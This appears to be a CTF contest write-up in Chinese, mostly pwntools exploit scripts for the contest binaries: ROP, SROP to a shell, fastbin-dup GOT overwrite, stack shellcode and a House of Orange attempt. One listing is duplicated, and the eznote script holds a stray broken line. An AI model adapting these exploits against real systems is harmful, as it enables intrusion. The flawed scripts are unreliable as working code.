个人信息

比赛昵称:不会pwn就哭

姓名:贺宇超

ezlogin

from pwn import *
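context.log_level = "debug"
# local run: p = process('./maybeheap')
# NOTE(review): this listing is identical to the "maybeheap" one further down,
# and the commented-out process() line names ./maybeheap, so the ezlogin script
# may have been pasted over. Confirm against the original notes.

HOST, PORT = "ctf.v50to.cc", 10468
# Written into the 16-byte name field. Presumably a function pointer the
# program calls afterwards (0x401228 is in the binary's .text) — confirm.
NAME_VALUE = p64(0x0401228)


def probe(index):
    """Open one connection and add a chunk at -*index* whose name is NAME_VALUE.

    The prompt advertises indices 0-9; sending a negative index bets that only
    the upper bound is checked, so the write lands below the chunk array. The
    session is then handed to the user. Returns True when the session ended
    normally and False if the service dropped the connection first (e.g. the
    index crashed it), so the loop can move on. The socket is always closed —
    the original left one open per iteration.
    """
    p = remote(HOST, PORT)
    try:
        p.sendlineafter(b"Choice:", b'1')
        # attach(p)
        p.sendlineafter(b"Enter index (0-9) to add a new Chunk: ", str(-index).encode())
        p.sendlineafter(b"Enter name for the new Chunk (up to 16 characters): ", NAME_VALUE)
        p.interactive()
        return True
    except EOFError:
        log.warning("index %d: connection closed by the service" % -index)
        return False
    finally:
        p.close()


for i in range(1, 20):
    probe(i)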

maybeheap

from pwn import *
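context.log_level = "debug"
# local run: p = process('./maybeheap')
# NOTE(review): this listing is identical to the "ezlogin" one above; the
# commented-out process() line names ./maybeheap, so this is probably the
# genuine maybeheap script and the ezlogin one was pasted over — confirm.

HOST, PORT = "ctf.v50to.cc", 10468
# Written into the 16-byte name field. Presumably a function pointer the
# program calls afterwards (0x401228 is in the binary's .text) — confirm.
NAME_VALUE = p64(0x0401228)


def probe(index):
    """Open one connection and add a chunk at -*index* whose name is NAME_VALUE.

    The prompt advertises indices 0-9; sending a negative index bets that only
    the upper bound is checked, so the write lands below the chunk array. The
    session is then handed to the user. Returns True when the session ended
    normally and False if the service dropped the connection first (e.g. the
    index crashed it), so the loop can move on. The socket is always closed —
    the original left one open per iteration.
    """
    p = remote(HOST, PORT)
    try:
        p.sendlineafter(b"Choice:", b'1')
        # attach(p)
        p.sendlineafter(b"Enter index (0-9) to add a new Chunk: ", str(-index).encode())
        p.sendlineafter(b"Enter name for the new Chunk (up to 16 characters): ", NAME_VALUE)
        p.interactive()
        return True
    except EOFError:
        log.warning("index %d: connection closed by the service" % -index)
        return False
    finally:
        p.close()


for i in range(1, 20):
    probe(i)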


ezcsu(企图用非srop的方法做,练练手,有个寄存器没法控制,失败了)

from pwn import *
context(os = 'linux', arch = 'amd64')
context.log_level="debug"
p=process('./ezcsu')
#p = remote("ctf.v50to.cc", 11295)
# Gadgets in the (static) binary; the ROPgadget dump is kept under the final
# version below. Names give the pop sequence; `sys_ret` is `syscall; ret`.
# Nothing here sets rdx, and rax is only ever zeroed (set_eax_0 /
# eax_0_leave_ret) or left at a syscall's return value — presumably the
# register the heading says could not be controlled.
rdi_ret=0x00000000004007f3
rsi_r15_ret=0x00000000004007f1
eax_0_leave_ret=0x00000000040075C   # zero eax, then leave; ret (per its name) — the function epilogue
sys_1_write=0x0000000000400777      # unused here
sys_ret=0x000000000040077E
main=0x0000000004006F3              # unused here
rbp_ret=0x0000000000400620
one=0x45226                         # libc-2.23 one_gadget offset; unused (no libc leak in this chain)
rbx_rbp_r12_13_14_15=0x0000000004007EA   # unused here
set_eax_0=0x000000000400727


# Stage 1: 0x68 bytes of filler reach the saved return address. The chain is
#   read(0, 0x601038, …)           first sys_ret — assumes rax is 0 when the
#                                  overflowed function returns (its epilogue
#                                  appears to be eax_0_leave_ret)
#   eax = 0; read(0, 0x601040, …)  second sys_ret
#   rbp = 0x601038; eax_0_leave_ret   `leave` moves rsp into .bss at 0x601038
# After the pivot `pop rbp` consumes the qword at 0x601038 and `ret` jumps to
# the qword at 0x601040, i.e. whatever the second read stored there.
payload=0x68*b'a'+p64(rdi_ret)+p64(0)+p64(rsi_r15_ret)+p64(0x000000000601038)+p64(0)+p64(sys_ret)\
+p64(0x000000000400727)+p64(rsi_r15_ret)+p64(0x000000000601040)+p64(0)\
+p64(sys_ret)+p64(rbp_ret)+p64(0x000000000601038)+p64(eax_0_leave_ret)
p.sendlineafter(" power!!",payload)

pause()
# Data for the first read (8 bytes -> 0x601038). It is only ever popped into
# rbp by `leave`, so the gadget address is just a placeholder.
payload=p64(0x00000000004007f2)
p.send(payload)

pause()
attach(p)
# Stage 2 (-> 0x601040, executed after the pivot). The syscall number is chosen
# through read()'s return value: "fl" and "ag" are sent as two 2-byte reads into
# 0x601008 / 0x60100a, so rax == 2 == SYS_open when the third sys_ret runs ->
# open("flag", 0). The following read(3, 0x3fd000, …) and write(1, 0x3fd000, …)
# would need rax == 0 and then rax == 1 with a usable rdx; only the read's rax
# is arranged (set_eax_0), and nothing in this script maps 0x3fd000 — which
# matches the heading's note that this attempt did not work.
payload=p64(rsi_r15_ret)+p64(0x000000000601008)+p64(0)+p64(sys_ret)\
+p64(set_eax_0)+p64(rsi_r15_ret)+p64(0x00000000060100a)+p64(0)+p64(sys_ret)\
+p64(rdi_ret)+p64(0x000000000601008)+p64(sys_ret)+p64(set_eax_0)\
+p64(rdi_ret)+p64(3)+p64(rsi_r15_ret)+p64(0x3fd000)+p64(0)+p64(sys_ret)\
+p64(rdi_ret)+p64(1)+p64(rsi_r15_ret)+p64(0x3fd000)+p64(0)+p64(sys_ret)
p.send(payload)
pause()

# Exactly 2 bytes each: the read's return value becomes the open() syscall number.
p.send(b'fl')
pause()
p.send(b'ag')
p.interactive()



ezcsu(最终版)

from pwn import *
context(os = 'linux', arch = 'amd64')
context.log_level="debug"
#p=process('./ezcsu')
p = remote("ctf.v50to.cc", 11295)
# Gadgets in the (static) binary; ROPgadget dump kept in the string at the end
# of this script. `sys_ret` is `syscall; ret`.
rdi_ret=0x00000000004007f3
rsi_r15_ret=0x00000000004007f1
eax_0_leave_ret=0x00000000040075C   # zero eax, then leave; ret (per its name) — the function epilogue
sys_1_write=0x0000000000400777      # unused here
sys_ret=0x000000000040077E
main=0x0000000004006F3              # unused here
rbp_ret=0x0000000000400620
one=0x45226                         # unused here
rbx_rbp_r12_13_14_15=0x0000000004007EA   # unused here
set_eax_0=0x000000000400727


# Stage 1 (same pivot as the first attempt): 0x68 bytes of filler reach the
# saved return address, then
#   read(0, 0x601038, …)           assumes rax == 0 at function return
#   eax = 0; read(0, 0x601040, …)
#   rbp = 0x601038; eax_0_leave_ret   `leave` moves rsp into .bss at 0x601038
# `pop rbp` then consumes the qword at 0x601038 and `ret` jumps to the qword at
# 0x601040 — the second stage — with eax already zeroed for its first syscall.
payload=0x68*b'a'+p64(rdi_ret)+p64(0)+p64(rsi_r15_ret)+p64(0x000000000601038)+p64(0)+p64(sys_ret)\
+p64(0x000000000400727)+p64(rsi_r15_ret)+p64(0x000000000601040)+p64(0)\
+p64(sys_ret)+p64(rbp_ret)+p64(0x000000000601038)+p64(eax_0_leave_ret)
p.sendlineafter(" power!!",payload)

#pause()
# Data for the first read (-> 0x601038); only popped into rbp by `leave`.
payload=p64(0x00000000004007f2)
p.send(payload)

# SROP frame for execve("/bin/sh" @0x601008, 0, 0) through the syscall gadget.
# NOTE: `frame` is built but never serialized — the stage-2 payload below uses a
# hard-coded byte string that appears to be an earlier dump of this frame.
frame = SigreturnFrame(kernel="amd64")
frame.rax = 59
frame.rdi = 0x000000000601008
frame.rsi = 0
frame.rdx = 0
frame.rip = sys_ret

payload=p64(rsi_r15_ret)+p64(0x000000000601008)+p64(0)+p64(sys_ret)+p64(sys_ret)+b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x10`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00~\x07@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
#attach(p)
pause()
# Stage 2 (lands at 0x601040): rsi = 0x601008, then two bare syscalls followed by
# a raw sigreturn frame. rax is 0 after eax_0_leave_ret, so the first syscall is
# read(0, 0x601008, …). The next send is exactly 15 bytes, so read() returns
# 15 == SYS_rt_sigreturn and the second syscall restores the frame from the
# stack: rax=59, rdi=0x601008 ("/bin/sh"), rsi=rdx=0, rip=sys_ret -> execve.
# The byte literal above looks like a serialization of `frame` (rdi 0x601008 at
# +104, rax 0x3b at +144, rip 0x40077e at +168, csgsfs 0x33 at +184) with the
# trailing zero bytes cut off; bytes(frame) should be equivalent, but verify in
# a debugger before swapping, since the literal is what actually ran.
p.send(payload)

# 15 bytes on purpose: "/bin/sh\0" + 7 filler -> read() returns 15 (see above).
p.send(b'/bin/sh\x00'+b'a'*7)

p.interactive()





# ROPgadget output for ./ezcsu, kept for reference.
'''
0x00000000004007ec : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ee : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007f0 : pop r14 ; pop r15 ; ret
0x00000000004007f2 : pop r15 ; ret
0x00000000004007eb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ef : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop rbp ; ret
0x00000000004007f3 : pop rdi ; ret
0x00000000004007f1 : pop rsi ; pop r15 ; ret
0x00000000004007ed : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400539 : ret
0x0000000000400542 : ret 0x200a


'''

人生重开(做过,省略)

ezcheckin

好多后门。一个知识点:在 Linux shell 里,“;” 是命令分隔符,前一条命令执行完(无论成功与否)都会接着执行下一条;而 sh 本身单独就能作为一个 shell 使用。

所以把返回地址溢出覆盖成执行“;sh”的那一条后门即可:前面的命令无论结果如何,“;” 之后的 sh 都会被启动。

ezrop

from pwn import *
from LibcSearcher import *

context(arch='amd64', log_level='debug', os='linux')
# (`LibcSearcher`, imported above, is not used by this script.)
elf=ELF('rop')
p=remote('ctf.v50to.cc',11822)
#p=process('./rop')
exit_got=elf.got['_exit']       # unused
open_plt=elf.plt['open']
read_plt=elf.plt['read']
write_plt=elf.plt['write']
pop_rdi_ret=0x0000000000401483
pop_rsi_r15_ret=0x0000000000401481
pop_rbp_ret=0x00000000004011fd

# Hidden menu option 4919 (0x1337) reaches the overflowing read. From the
# payloads below the reader (re-entered at 0x401304) appears to read more than
# 0x100 bytes into a 0x100 buffer at rbp-0x100 — confirm in the binary.
p.sendlineafter("your choice:",b'4919')
# Round 1: only saved rbp and rip are overwritten. rbp -> 0x404668 (.bss),
# rip -> 0x401304 re-enters the reader, whose buffer is now rbp-0x100 = 0x404568.
payload=b'a'*256+p64(0x000000000404060+0x100+0x500+8)+p64(0x000000000401304)
sleep(1)
p.send(payload)

sleep(1)
#attach(p)
# Original note: "starts at 0x404060+0x100+0x500+8" — that is the saved-rbp
# value; the chain bytes themselves are read into rbp-0x100 = 0x404568.
# Round 2: the ROP chain fills 0x404568..0x404668. The trailing saved rbp/rip
# (0x404560 / 0x401304) re-enter the reader a third time; its leave;ret then
# leaves rsp at 0x404568, on the chain. Chain contents:
#   open("./flag", 4)              the string sits at chain+152 = 0x404600,
#                                  which is the 0x404668-104 below (flags 4
#                                  has no access-mode bits set, so read-only)
#   pop rbp 0x4045a8; 0x401304     one more reader call (buffer 0x4044a8);
#                                  its leave;ret puts rsp at 0x4045b0, the
#                                  `pop rdi; 3` entry that follows
#   read(3, 0x404060, rdx)         rdx is whatever the previous call left
#   write(1, 0x404060, rdx)
#   0x40139c                       presumably main/exit — confirm
# The "r\x00" after "./flag\x00" is leftover and never read as part of the path.
payload=(p64(pop_rdi_ret)+p64(0x000000000404060+0x100+0x500+8-104)+p64(pop_rsi_r15_ret)+p64(4)+p64(0)+\
p64(open_plt)+p64(pop_rbp_ret)+p64(4212328+0x70-0x100-0x30)+p64(0x000000000401304)+\
p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_r15_ret)+p64(0x000000000404060)+p64(0)+\
p64(read_plt)+p64(pop_rdi_ret)+p64(1)+p64(write_plt)+p64(0x00000000040139C)+b'./flag\x00r\x00'
).ljust(256,b'a')+p64(0x000000000404060+0x500)+p64(0x000000000401304)
#0x100
p.send(payload)
# Original note: "jumps to 0x404060+0x500" — the next saved rbp (0x404560).
sleep(1)
p.send(b'lalala')   # consumed by the third reader call (buffer 0x404460)

sleep(1)
p.send(b'lalala')   # consumed by the in-chain reader call (buffer 0x4044a8)
p.interactive()

# ROPgadget output for ./rop, kept for reference.
'''
Gadgets information
============================================================
0x000000000040147c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040147e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401480 : pop r14 ; pop r15 ; ret
0x0000000000401482 : pop r15 ; ret
0x000000000040147b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040147f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004011fd : pop rbp ; ret
0x0000000000401483 : pop rdi ; ret
0x0000000000401481 : pop rsi ; pop r15 ; ret
0x000000000040147d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040101a : ret
0x0000000000401277 : ret 0x2be



'''

heap

from pwn import *

context.log_level = 'debug'
# local run: p = process('./ezheap')
p = remote("ctf.qwq.cc", 13288)     # challenge instance
elf = ELF('ezheap')                 # target binary (GOT addresses used below start at 0x602018)
libc = ELF('libc-2.23.so')          # provided libc; the one_gadget offsets below are for 2.23

def add(size, name, kind):
    """Menu 1: create an animal.

    The length and kind prompts are answered with a trailing newline; the
    name itself is sent raw (sendafter), so no newline is appended to it.
    Uses the module-level tube ``p``.
    """
    steps = (
        ("Your choice : ", b'1', True),
        ("Length of the name :", str(size), True),
        ("The name of animal :", name, False),     # read into a buffer, raw
        ("The kind of the animal :", kind, True),  # consumed by scanf
    )
    for prompt, data, newline in steps:
        sender = p.sendlineafter if newline else p.sendafter
        sender(prompt, data)

def dele(num):
    """Menu 3: free the animal in slot *num* (sent as its decimal string)."""
    answers = [
        ("Your choice : ", b'3'),
        ("Which animal do you want to remove from the cage:", str(num)),
    ]
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)


def show():
    """Menu 2: list the animals; the caller parses whatever is printed."""
    choice = b'2'
    p.sendlineafter("Your choice : ", choice)
#attach(p)
# Two 0x58-byte requests -> two 0x60 fastbin chunks (slots 0 and 1).
add(0x58,b'heshi',b'1')
add(0x58,b'heshi',b'1')

# Fastbin double free (0 -> 1 -> 0): chunk 0 sits in the 0x60 bin twice, so the
# next allocation hands it back while a copy is still queued (fastbin dup).
dele(0)
dele(1)
dele(0)

# The first allocation gets chunk 0 back and its "name" overwrites the queued
# copy's fd with a fake chunk address just below the GOT. The -14 misalignment
# is what makes the fake chunk's size field pass the fastbin size check (the
# value was found with the brute-force script in the next section). The fake
# chunk's user data starts 16 bytes past this address, i.e. at 0x60200a.
add(0x58,p64(0x000000000602018-0x10-14),b'1')# user data starts 16 bytes past this address
add(0x58,b'0',b'1')
add(0x58,b'0',b'1')
# Fourth allocation lands on the fake chunk. Exactly 14 bytes are written raw,
# filling 0x60200a..0x602018 with no terminator, so the name runs straight into
# the pointer stored at 0x602018.
add(0x58,b'0'*14,b'1')

# Listing the animals prints that name and, with it, the pointer at 0x602018.
show()

# First 6 bytes ending in 0x7f = the leaked pointer; it is treated as free's
# resolved GOT entry, hence the subtraction of libc.sym['free'].
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))-libc.sym['free']
print(hex(libc_base))
one=[0x45226,0x4527a,0xf03a4,0xf1247]   # libc-2.23 one_gadget candidates; [1] worked here
one_gadget=libc_base+one[1]

# Second fastbin dup using the chunks allocated above (slot numbers 3/4 are
# assumed from the program's slot assignment).
dele(3)
dele(4)
dele(3)


add(0x58,p64(0x000000000602018-0x10-14),b'1')# user data starts 16 bytes past this address
add(0x58,b'0',b'1')
add(0x58,b'0',b'1')
#attach(p)
# Back on the fake chunk: 22 filler bytes cover 0x60200a..0x602020 (this also
# overwrites the pointer at 0x602018 with '0's), then one_gadget replaces the
# GOT entry at 0x602020. Whatever function that entry belongs to must be the
# next one the program calls, and free must not be called first — confirm in
# the binary.
add(0x58,b'0'*22+p64(one_gadget),b'1')

p.interactive()

爆破版(暂存)

from pwn import *


def add(size, name, kind):
    """Menu 1: create an animal.

    Unlike the remote exploit's helper, every answer here — including the
    name — is newline-terminated (sendlineafter). Uses the module-level tube ``p``.
    """
    for prompt, answer in (
        ("Your choice : ", b'1'),
        ("Length of the name :", str(size)),
        ("The name of animal :", name),          # buf
        ("The kind of the animal :", kind),      # scanf
    ):
        p.sendlineafter(prompt, answer)


def dele(num):
    """Menu 3: remove the animal in slot *num* (sent as its decimal string)."""
    prompts = iter(("Your choice : ",
                    "Which animal do you want to remove from the cage:"))
    for reply in (b'3', str(num)):
        p.sendlineafter(next(prompts), reply)


def show():
    """Menu 2: print the animal list."""
    menu_prompt = "Your choice : "
    p.sendlineafter(menu_prompt, b'2')


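def pwn(i):
    """Set up the fastbin dup with candidate fd offset *i*.

    Three 0x58-byte animals are created, slot 0 is freed twice around slot 1
    (fastbin double free), and the first re-allocation writes
    ``0x602018 - 0x10 - i`` into the dangling fd. After the two allocations
    that drain the real chunks, the caller performs one more: if glibc's
    fastbin size check rejects the fake chunk it aborts with
    "malloc(): memory corruption (fast)", otherwise *i* is a usable offset.
    Uses the module-level tube ``p``.
    """
    # (the unused ELF('ezheap') load that ran on every attempt was dropped)
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')

    dele(0)
    dele(1)
    dele(0)

    # fd of the doubly-freed chunk -> fake chunk; its user data begins 16 bytes later
    add(0x58, p64(0x602018 - 0x10 - i), b'1')
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')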


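context.log_level = 'debug'
for i in range(0x58):
    p = process('./ezheap')
    try:
        pwn(i)
        # attach(p)
        # this extra allocation is what trips the fastbin size check for a bad offset
        add(0x58, b'heshi', b'1')
        wrong = p.recvline(timeout=2)
        if b'malloc():' in wrong:
            continue        # glibc abort message: this offset is rejected
        print(i)            # candidate offset that survived the check
        p.interactive()
    except EOFError:
        # the child died on this offset (abort / segfault) — try the next one.
        # The original bare `except:` also swallowed KeyboardInterrupt, so the
        # loop could not be stopped with Ctrl-C.
        pass
    finally:
        p.close()           # the original leaked one child process per attempt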



one爆破(不知道libc_main在哪)

from pwn import *

context.log_level='debug'
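def pwn(i):
    """One attempt: write the single byte *i* into the slot assumed to be exit@GOT.

    The service prints the address of main and a stack address (parsed from
    the "= … and" and "= …<newline>" markers). main is taken to sit at
    PIE+0x13b8 and exit's GOT entry at PIE+0x4050 — confirm both against the
    binary. After the three prompts the session is handed to the user; the
    connection is closed when that returns or when the service drops it
    (the original never closed any of the brute-force connections).
    """
    #p = process("./one")
    p = remote("ctf.qwq.cc", 13351)
    try:
        p.recvuntil("= ")
        main = int(p.recvuntil(" and")[:-4], 16)
        base_process = main - 0x13B8
        exit_addr = base_process + 0x4050

        p.recvuntil("= ")
        stack = int(p.recvuntil("\n")[:-1], 16)
        print(hex(base_process))
        print(hex(stack))
        # attach(p)
        p.sendlineafter("What address you want to write?", hex(exit_addr))
        p.sendlineafter("What value you want to write?", str(i))
        # the "modify" prompt gets the leaked stack address; in the final
        # version it appears to take a page whose permissions get changed
        p.sendlineafter("What address you want to modify?", hex(stack))
        print(i)
        p.interactive()
    finally:
        p.close()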


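# Brute-force the single byte written over exit@GOT. The original bare
# `except:` also swallowed KeyboardInterrupt (Ctrl-C could not stop the loop);
# only the two failure modes actually expected are skipped now.
for i in range(0x100):
    try:
        pwn(i)
    except EOFError:
        # the service closed the connection on this byte value
        print("value %#x: connection closed" % i)
    except ValueError:
        # the banner did not parse as two hex numbers; skip rather than abort
        print("value %#x: could not parse the leaked addresses" % i)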

one正式

from pwn import *

context(arch='amd64', log_level='debug', os='linux')
#p = process("./one")
p=remote("ctf.qwq.cc",13392)

# The service prints the address of main and a stack address; main is taken
# to sit at PIE+0x13b8, exit's GOT entry at PIE+0x4050 and the immediate that
# sets read's length at PIE+0x12a0 — all three are offsets to confirm in the
# binary. Each round answers three prompts: an address, a byte value (all
# values used stay below 0x100) and a "modify" address, which from its use
# below appears to make the given page writable/executable.
p.recvuntil("= ")
main = p.recvuntil(" and")[:-4]
main = int(main, 16)
base_process = main - 0x13B8
exit_addr = base_process + 0x4050
target = base_process + 0x12A0

p.recvuntil("= ")

stack = p.recvuntil("\n")[:-1]
stack = int(stack, 16)
print(hex(base_process))
print(hex(stack))
# attach(p)
# Round 1: point exit's GOT entry back into __libc_start_main so the program
# loops instead of exiting (original note). The low byte becomes 0xf0 = 240;
# __libc_start_main+240 is the return site after `call main` in libc-2.23 —
# assumption carried over from the author's note. The "modify" target is the
# code page (PIE+0x1000) so that round 2 can patch .text.
p.sendlineafter("What address you want to write?", hex(exit_addr))
p.sendlineafter("What value you want to write?", str(240))
p.sendlineafter("What address you want to modify?", hex(base_process + 0x1000))

# Round 2: patch read's length (0xaa) so the next read overflows the stack buffer.
p.sendlineafter("What address you want to write?", hex(target))
p.sendlineafter("What value you want to write?", str(0xAA))


shell = asm(shellcraft.sh())
# Round 3's "modify" answer doubles as the overflow: the first 0x20 bytes are
# the page-aligned leaked stack address (so the stack page is made executable),
# then saved rbp (stack-1000, decimal — the value is never dereferenced by the
# shellcode), then the return address stack-0x12c (the difference of the two
# debug-session addresses; it should be where `shell` lands — re-check if the
# leak's distance to the buffer differs), then the shellcode itself.
payload = (hex((stack//0x1000)*0x1000).encode() + b'\x00').ljust(0x20, b'a')+p64(stack-1000) + p64(stack + 0x7ffe8f0733f0 - 0x7ffe8f07351c) + shell
#attach(p)
p.sendlineafter("What address you want to modify?", payload)

p.interactive()

note暂存(做不出来)

from pwn import *

context.log_level = 'debug'
p = process('./eznote')
# remote instance: p = remote("ctf.qwq.cc", 13395)

# NOTE(review): the ELF loaded here is 'ezheap' while the process is
# './eznote' — looks copied from the previous exploit. `elf` is not used
# below, but check which binary was meant.
elf = ELF('ezheap')
libc = ELF('libc-2.23.so')

def add(size, context):
    """Menu 1: create a note of *size* bytes whose content is *context*.

    All three answers are sent raw (sendafter, no newline). The parameter
    name shadows pwntools' ``context`` inside this function; it is only the
    payload here. Uses the module-level tube ``p``.
    """
    for prompt, answer in (("Your choice", b'1'),
                           ("Length of Note", str(size)),
                           ("Content of Note:", context)):
        p.sendafter(prompt, answer)

def edit(index, size, context):
    """Menu 2: rewrite note *index* with *size* bytes of *context*.

    The length is supplied independently of the note's original allocation;
    the exploit below passes one larger than the note was created with.
    Everything is sent raw (sendafter). Uses the module-level tube ``p``.
    """
    replies = [
        ("Your choice", b'2'),
        ("Index :", str(index)),
        ("Length of Note : ", str(size)),
        ("Content of Note", context),   # buf
    ]
    for prompt, reply in replies:
        p.sendafter(prompt, reply)


def show(index):
    """Menu 3: print note *index*; the caller reads the output."""
    menu, which = "Your choice ", "Index"
    p.sendafter(menu, b'3')
    p.sendafter(which, str(index))
p.sendafter("Index",str(index))

# The program leaks a heap pointer on start; it sits 0x10 past the heap base
# (the two debug-session constants differ by 0x10).
p.recvuntil("A gift for you~: ")
heap=p.recvline()[:-1]
heapbase=int(heap,16)-0x55eace242010+0x55eace242000
print(hex(heapbase))
sleep(1)

# Note 0: a 0x10-byte request (0x20 chunk at the heap base). The edit below
# writes 0x1b bytes with a declared length of 0x50 — the heap overflow — and
# appears to aim at the top-chunk header that follows: 0x10 bytes of data, a
# -1 qword, then the low three size bytes b1 00 00. Which field each part hits
# depends on the exact chunk layout; verify in gdb. The intent reads as
# House of Orange: shrink top so the 0x100 request goes through sysmalloc and
# the old top is freed into the unsorted bin; the 0x40 request is then carved
# from it and keeps the bin's bk pointer after its first 8 bytes.
add(0x10,b'123')
payload=b'a'*0x10+p64(0xffffffffffffffff)+b"\xb1\x00\x00"
edit(0,0x50,payload)
add(0x100,b'123')
add(0x40,b'a'*8)

show(2)

# 8 'a's, then 6 bytes of the leftover bk pointer = main_arena+88; the constant
# 0x3c4b78 (difference of the two debug addresses) is that offset in libc-2.23.
p.recvuntil('aaaaaaaa')
libcbase=u64(p.recv(6).ljust(8,b'\x00'))+0x7f363b43c000-0x7f363b800b78
print(hex(libcbase))

io_list_all=libcbase+libc.symbols['_IO_list_all']
system_addr=libcbase+libc.symbols['system']
realloc_hook=libcbase+libc.symbols['__realloc_hook']   # computed but not used below

log.success("heapbase: "+hex(heapbase))
log.success("realloc_hook: "+hex(realloc_hook))


# Fake vtable location. NOTE(review): this must be where `pad` actually ends
# up after the edit; with note 0's data at heapbase+0x10 the +0x140 here is
# not obviously right, which may be one reason the attempt stalled — check.
vtable_addr = heapbase +0x140

# Fake vtable: slots 0-2 unused, slot 3 (__overflow) = system.
pad =p64(0)*3+p64(system_addr) # vtable
pad += p32(6)+p32(6)+p64(0)   # filler between vtable and fake FILE (values not obviously significant)

# Fake _IO_FILE overlaid on a freed chunk header: "/bin/sh\0" doubles as
# prev_size/_flags (the argument system() receives), 0x61 as the size (a
# 0x60 smallbin size, so _IO_list_all's would-be "chunk" passes the sanity
# checks), bk = _IO_list_all-0x10 for the unsorted-bin attack (the next malloc
# that sorts this chunk writes its address into _IO_list_all).
stream = b"/bin/sh\x00"+p64(0x61)
stream += p64(0xddaa)+p64(io_list_all-0x10)
stream +=p64(1)+p64(2) # fp->_IO_write_ptr > fp->_IO_write_base
stream = stream.ljust(0xc0,b"\x00")
stream += p64(0) # mode<=0
stream += p64(0)
stream += p64(0)
stream += p64(vtable_addr)

payload = pad + stream

attach(p,
'''
finish\n

''')
# Overflow from note 0 over the following chunk header(s) with the fake FILE.
# NOTE(review): the offsets (stream at note 0's data + 0x30) were not verified
# against where the freed old-top remainder actually sits — confirm in gdb.
edit(0,0x800,payload)

# Any further allocation makes malloc process the corrupted unsorted bin;
# the resulting abort walks _IO_list_all and calls the fake __overflow.
p.recvuntil('Your choice : ')
p.sendline(str(1))
p.interactive()


# gdb.attach(r,
# '''
# b*$rebase(0xda5)\n
# c\n
# vmmap\n
# '''
# )

1024

复制分组对抗的exp,改端口,通

逆向

逆向部分除了 ezida 是自己动调做出来的,剩下的全是靠百度搜到的;如有疑问可以私我,我给你演示怎么搜。(ps:我猜 cc 也看不到这句话)

web

上网一搜,参数一换,通

杂项

噩梦

wps提取图片,根据大小排列,出

踩踩

搜文件名,下软件,提取图片里面隐藏的图片。塞软件,出。

密码1

随波逐流一把梭